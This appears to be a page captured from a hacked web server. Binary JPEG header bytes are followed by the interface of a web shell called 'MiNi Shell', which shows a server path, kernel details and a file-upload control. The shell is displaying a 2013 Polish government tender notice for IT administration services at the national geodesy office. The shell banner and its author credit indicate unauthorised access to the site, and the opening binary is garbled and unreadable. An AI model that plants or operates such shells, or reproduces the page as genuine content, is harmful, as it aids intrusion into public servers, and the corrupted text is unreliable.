JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130513/186740-N-2013.html

<p class="kh_header"><b>Warszawa: Obsługa informatyczna Głównego Urzędu Geodezji i Kartografii - Nr ref. ZP/BO-4-2500-15/BO-2500-10/2013</b><br>
<b>Numer ogłoszenia: 186740 - 2013; data zamieszczenia: 13.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Główny Urząd Geodezji i Kartografii , ul.  Wspólna 2, 00-926 Warszawa, woj. mazowieckie, tel. 022 6618432, faks 022 6283467.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gugik.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa informatyczna Głównego Urzędu Geodezji i Kartografii - Nr ref. ZP/BO-4-2500-15/BO-2500-10/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obsługa informatyczna Głównego Urzędu Geodezji
i Kartografii, zwanego dalej GUGiK, obejmująca serwis systemu informatycznego pracującego na potrzeby biurowe w siedzibie GUGiK (00-926 Warszawa ul. Wspólna 2)
i serwis systemu teleinformatycznego przeznaczonego do przetwarzania i archiwizowania informacji niejawnych pracującego w siedzibie GUGIK w Departamencie Spraw Obronnych oraz Ochrony Informacji Niejawnych (w kancelarii tajnej), polegająca na:
1)	bieżącym konfigurowaniu oprogramowania, w sposób właściwy ze względu na jego przeznaczenie oraz potrzeby Zamawiającego;
2)	administrowaniu lokalną siecią komputerową - w tym bieżącym monitorowaniu sieci komputerowej, rozwiązywaniu problemów związanych z siecią, stałej optymalizacji ruchu sieciowego, bieżącym monitorowaniu stanu klimatu w pomieszczeniu serwerowni, administrowaniu systemem kontroli dostępu etc.;
3)	podejmowaniu działań związanych z rozwiązywaniem problemów, które są sygnalizowane przez system Spiceworks;
4)	przeprowadzaniu bieżących testów bezpieczeństwa systemów informatycznych;
5)	wykonywaniu konserwacji i napraw sprzętu informatycznego posiadanego przez Zamawiającego we własnym zakresie lub - po uzgodnieniu z Zamawiającym - przekazywaniu do serwisu z profesjonalnym opisem uszkodzenia, jeśli sprzęt (osprzęt) jest na gwarancji lub naprawa we własnym zakresie jest niemożliwa oraz jego rekonfigurowaniu po naprawie, jeśli naprawa będzie obejmować wymianę podzespołu;
6)	instalowaniu nowo zakupionego sprzętu i oprogramowania na stanowiskach pracy oraz przenoszeniu sprzętu między stanowiskami, po uzgodnieniu z Zamawiającym;
7)	instalacji i konfiguracji serwerów sieciowych zgodnie z bieżącymi potrzebami Zamawiającego;
8)	usuwaniu awarii oprogramowania;
9)	uaktualnianiu oprogramowania;
10)	nadzorowaniu wykonywania usług teleinformatycznych świadczonych Zamawiającemu przez firmy drugie, w szczególności dostawcę usług internetowych, w celu zapewnienia stałej łączności sieci lokalnej Zamawiającego z Internetem, w tym prowadzeniu korespondencji roboczej z zakresie uzgodnionym z Zamawiającym;
11)	planowaniu potrzeb w dziedzinie sprzętu i oprogramowania, w tym systemowego
w ramach optymalizacji parametrów pracy systemu, mającej na celu podniesienie jego sprawności i niezawodności;
12)	przygotowywaniu zakupów sprzętu i oprogramowania na potrzeby biurowe Zamawiającego, w tym opracowywaniu specyfikacji istotnych warunków zamówienia do przetargów oraz specyfikacji (i konfiguracji sprzętu) do postępowań o zamówienie publiczne przeprowadzanych w innych trybach;
13)	dbaniu o bezpieczeństwo sieci oraz integralność i poufność zgromadzonych danych (monitorowanie stanu klimatu w serwerowni, ochrona przed intruzami, wirusami
i innym złośliwym oprogramowaniem) 24 h na dobę, w tym współpracy w tej dziedzinie z odpowiednią komórką Zamawiającego;
14)	reakcji na zagrożenia opisane w pkt. 13, niezwłocznie po otrzymaniu informacji
o ich wystąpieniu;
15)	archiwizacji danych znajdujących się na serwerach sieciowych, w tym bieżącym monitoringu wykonania archiwizacji, aktualizacji i opracowywaniu polityki tworzenia kopii bezpieczeństwa;
16)	zapewnieniu bieżącej, codziennej obsługi serwisów internetowych Zamawiającego
w zakresie redakcji treści:
a)	serwisów internetowych GUGiK (www.gugik.gov.pl, www.inspire.gov.pl, www.ksng.gugik.gov.pl, www.radaiip.gov.pl),
b)	Biuletynu Informacji Publicznej (BIP) GUGiK,
c)	w serwisach społecznościowych (Facebook, YouTube, Twitter, Wikipedia etc.);
17)	zapewnieniu bieżącej, codziennej obsługi Elektronicznej Skrzynki Podawczej GUGiK oraz usług udostępnianych przez Zamawiającego na platformie ePUAP w zakresie odbioru i wysyłki korespondencji elektronicznej;
18)	przygotowywaniu pisemnych opracowań: informacji, opinii i analiz w zakresie systemu informatycznego Zamawiającego na potrzeby Kierownictwa GUGiK i władz zwierzchnich;
19)	wykonywaniu innych działań zapewniających sprawność systemów informatycznych Zamawiającego, w szczególności:
a)	dokonywaniu doraźnych zakupów akcesoriów i materiałów eksploatacyjnych do zespołów komputerowych,
b)	wymianie ładunków tuszy i tonerów w drukarkach komputerowych,
c)	przygotowywaniu do pracy sprzętu do prezentacji multimedialnych (rzutnik,
komputer przenośny, ekran) w salach konferencyjnych (nr 3094, 3105, 3107
i 3108),
d)	udzielaniu doraźnego instruktażu, porad i pomocy pracownikom Zamawiającego
w zakresie obsługi PC oraz oprogramowania systemowego i biurowego,
e)	prowadzeniu profesjonalnej ewidencji sprzętu i oprogramowania używanych przez Zamawiającego;
20)	wykonywaniu obowiązków Administratora Systemu Informatycznego (ASI)
w odniesieniu do systemów informatycznych służących do przetwarzania danych osobowych w GUGiK, w tym świadczeniu pomocy w przygotowywaniu instrukcji
i polityk zarządzania systemami informatycznymi służącymi do przetwarzania danych osobowych w zakresie dotyczącym aspektów technicznych;
21)	wykonywaniu obowiązków administratora systemu teleinformatycznego przezna-czonego do przetwarzania i archiwizowania informacji niejawnych, w sposób zapewniający przestrzeganie zasad i wymagań bezpieczeństwa przewidzianych dla tego systemu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.32.41.00-3, 72.10.00.00-6, 72.51.10.00-0, 50.31.20.00-5, 50.32.00.00-4, 72.51.43.00-4, 72.60.00.00-6, 72.61.10.00-6, 72.71.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykażą się doświadczeniem należytego wykonania w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie dwóch usług polegających na: administrowaniu siecią, serwerami i systemami komputerowymi, pracującymi pod kontrolą oprogramowania systemowego, wykorzystującymi oprogramowanie zabezpieczające, sieciowe i użytkowe przez okres min. 6 miesięcy, w tym jednej usługi, gdzie obsługiwał min. 100 użytkowników.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Dysponują dwiema osobami zdolnymi do wykonania zamówienia, z których każda posiada następujące doświadczenie i kompetencje:
1)	w okresie ostatnich trzech lat przed upływem terminu składania ofert była odpowiedzialna za wykonywanie co najmniej jednego zamówienia (usługi) administrowania siecią, serwerami i systemami komputerowymi, pracującymi pod kontrolą oprogramowania systemowego, wykorzystującym oprogramowanie zabezpieczające, sieciowe i użytkowe , gdzie obsługiwała min. 100 użytkowników przez okres min.6 miesięcy;
2)	wykształcenie wyższe informatyczne lub pokrewne;
3)	znajomość języka angielskiego w stopniu umożliwiającym czytanie dokumentacji technicznej, 
4)	znajomość systemów operacyjnych z rodziny Microsoft Windows NT 4, 2000, XP, Vista, 7, 8 oraz Microsoft Windows 95, 98, ME, MAC OS X na poziomie administratora;
5)	znajomość systemów operacyjnych sieciowych z rodziny Microsoft Windows Server 
w wersjach 2000, 2003, 2008, 2008 R2, 2012 i sieci zbudowanych na bazie tych systemów, na poziomie administratora;
6)	znajomość Microsoft Exchange Server 2007 na poziomie administratora i doświadczenie w tym zakresie;
7)	znajomość oprogramowania i technik wirtualizacji opartych na platformie VMware ESXi i Microsoft Hyper-V;
8)	znajomość systemów Linux na poziomie administratora;
9)	znajomość urządzeń mobilnych opartych na systemie Google Android na poziomie administracji i zarządzania;
10)	znajomość zagadnień związanych z administrowaniem sieciami informatycznymi LAN, WAN, VPN na poziomie administratora i doświadczenie w tym zakresie;
11)	znajomość zagadnień związanych z zestawianiem tuneli VPN za pomocą protokołów IPsec oraz SSL w ujęciu server to server i server to client;
12)	znajomość zagadnień związanych z użytkowaniem podstawowych aplikacji biurowych (przede wszystkim Microsoft Office XP, 2003, 2007, 2010, 2013) na poziomie administratora i doświadczenie w tym zakresie;
13)	znajomość zagadnień związanych z ochroną antywirusową i centralną administracją oprogramowaniem antywirusowym w sieciach lokalnych na poziomie administratora (przede wszystkim Eset) i doświadczenie w tym zakresie;
14)	znajomość zagadnień związanych z wykonywaniem kopii bezpieczeństwa serwerów 
i obsługą oprogramowania przeznaczonego do tego celu na poziomie administratora (przede wszystkim Symantec Backup Exec 12 i 2010, Tanberg Data AccuVault) 
i doświadczenie w tym zakresie;
15)	znajomość zagadnień związanych z administracją systemami zabezpieczeń na styku sieci lokalnej z Internetem na poziomie administratora (przede wszystkim Microsoft ISA Server 2006 i Fortigate) i doświadczenie w tym zakresie;
16)	znajomość funkcjonowania sprzętu komputerowego (przede wszystkim stacji roboczych 
i serwerów) i podstawowych urządzeń peryferyjnych oraz sposobów ich serwisowania na poziomie administratora i doświadczenie w tym zakresie; 
17)	znajomość języków: PHP, CSS, HTML, XHTML;
18)	znajomość języka SQL oraz baz danych typu MS Access oraz MySQL, PostrgreSQL;
19)	wiedzę specjalistyczną z zakresu administrowania systemem CMS MySource Matrix;
20)	doświadczenie w projektowaniu stron WWW i administrowaniu nimi;
21)	doświadczenie w administrowaniu aplikacjami forów internetowych phpBB i Invision PowerBoard;
22)	znajomość obsługi administracyjnej, użytkowania jako sieciowy serwer skanowania 
i wydruków maszyn wielofunkcyjnych, takich jak: Fiery Digital Print, Konica Minolta bizhub 250 , Konica Minolta bizhub 223 i Konica Minolta  7xxx;
23)	biegłą znajomość kwestii bezpieczeństwa dostępu do sieci WiFi i administracyjna znajomość autoryzacji klientów poprzez RADIUS;
24)		biegłą znajomość oprogramowania do monitoringu, zarządzania i inwentaryzacji infrastruktury IT - Spiceworks;
25)	znajomość systemów MAC OS X oraz komputerów marki Apple;
26)	znajomość oprogramowania do zarządzania kontrolą dostępu na poziomie administratora;
27)	znajomość technologii zewnętrznych macierzy dyskowych NAS i SAN oraz technologii iSCSI;
28)	doświadczenie w przygotowywaniu dokumentów dotyczących integralności danych 
i polityk bezpieczeństwa;
29)	umiejętność przeprowadzania wewnętrznych audytów bezpieczeństwa oraz testów penetracyjnych w sieciach LAN;
30)	umiejętność zarządzania sieciami rozległymi połączonymi tunelami VPN między różnymi lokalizacjami ze szczególnych uwzględnieniem integralności i bezpieczeństwa danych
oraz spełniającymi wymagania określone przepisami art. 16 oraz art. 52 ust. 1 pkt. 4 ustawy
z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych, tj. posiadającymi:
-	obywatelstwo polskie,
-	aktualne poświadczenie bezpieczeństwa o klauzuli tajne, lub złożą oświadczenie
o gotowości do poddania się procedurze sprawdzającej w celu uzyskania takiego poświadczenia,
-	zaświadczenie o odbytym szkoleniu w zakresie ochrony informacji niejawnych lub złoży oświadczenie o gotowości do odbycia takiego szkolenia w celu uzyskania zaświadczenia,
-	zaświadczenie o odbyciu specjalistycznego szkolenia z zakresu bezpieczeństwa teleinformatycznego przeprowadzonego przez Agencję Bezpieczeństwa Wewnętrzne-go lub Służbę Kontrwywiadu Wojskowego lub złoży oświadczenie o gotowości do odbycia takiego szkolenia w celu uzyskania zaświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - wartość merytoryczna oferty - 60</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wykonawca, który przedstawił najkorzystniejszą ofertę, będzie zobowiązany do podpisania umowy, której wzór stanowi załącznik nr 3 do SIWZ, w miejscu i terminie wskazanym przez Zamawiającego.
2.	Wzór umowy po upływie terminu składania ofert nie podlega negocjacjom.
3.	Wykonawcy, składający ofertę wspólnie, ponoszą solidarną odpowiedzialność za wykonanie umowy.
4.	Zamawiający zgodnie z zapisem art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych przewiduje możliwość dokonania zmiany postanowień umowy 
w przypadku ewentualnej zmiany osoby wskazanej w ofercie złożonej przez Wykonawcę 
w składzie zespołu Wykonawcy pod warunkiem zastąpienia dotychczasowej osoby osobą 
o co najmniej takich samych kwalifikacjach, doświadczeniu oraz wiedzy, jakich wymagał Zamawiający na etapie postępowania o udzielenie zamówienia. W takiej sytuacji Wykonawca zobowiązany jest do niezwłocznego poinformowania Zamawiającego 
o konieczności dokonania zmiany w składzie zespołu osób wykonujących przedmiot umowy. Zmiana w składzie zespołu Wykonawcy nie wymaga formy aneksu do umowy - będzie uznana za skuteczną po pisemnym poinformowaniu o tym fakcie Zamawiającego, przed planowaną datą dokonania zmiany i uzyskaniu akceptacji Zamawiającego.
5.	Zamawiającemu przysługuje prawo odmowy w zakresie dokonanej zmiany w składzie zespołu Wykonawcy w przypadku niedochowania przez Wykonawcę zasad przeprowadzenia zmiany określonej w ust. 4.
6.	Zamawiający może zażądać od Wykonawcy zmiany osoby wykonującej zamówienie, na warunkach określonych w ust. 4, jeżeli uzna, że osoba ta nie wykonuje należycie swoich obowiązków.
7.	W przypadku, o którym mowa w ust. 4-6, wynagrodzenie Wykonawcy nie ulega zmianie. 
8.	W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
9.	Zamawiający może odstąpić w trybie natychmiastowym od wykonywania przedmiotu umowy w przypadku, gdy Wykonawca narusza warunki umowy, a w szczególności 
w sytuacji, gdy zwłoka w wykonaniu przedmiotu umowy wynosi więcej niż 15 dni od upływu wyznaczonego terminu.
10.	W przypadkach, o których mowa w ust. 8 i 9, Wykonawca może żądać jedynie należnego mu wynagrodzenia z tytułu wykonanej części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gugik.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Główny Urząd Geodezji i Kartografii, 00-926 Warszawa, ul. Wspólna 2, pok - 3121.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2013 godzina 12:00, miejsce: Główny Urząd Geodezji i Kartografii, 00-926 Warszawa, ul. Wspólna 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Zamawiający na podstawie art. 34 ust. 5 ustawy Pzp. przewiduje prawo opcji. 
2.	Całość zamówienia wraz z opcją wykonywane będzie przez okres 48 miesięcy od zawarcia umowy.
3.	Zamówienie podstawowe wykonywane będzie przez okres 24 miesięcy oraz zamówienie opcjonalne po wcześniejszym zawiadomieniu Wykonawcy wykonywane będzie przez okres 24 miesięcy.
4.	Zamawiający zastrzega sobie prawo do nieskorzystania z opcji.
5. Termin wykonania zamówienia wynosi: 48 miesięcy od zawarcia umowy, w tym 24 miesiące zamówienie podstawowe i 24 miesiące zamówienie opcjonalne..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com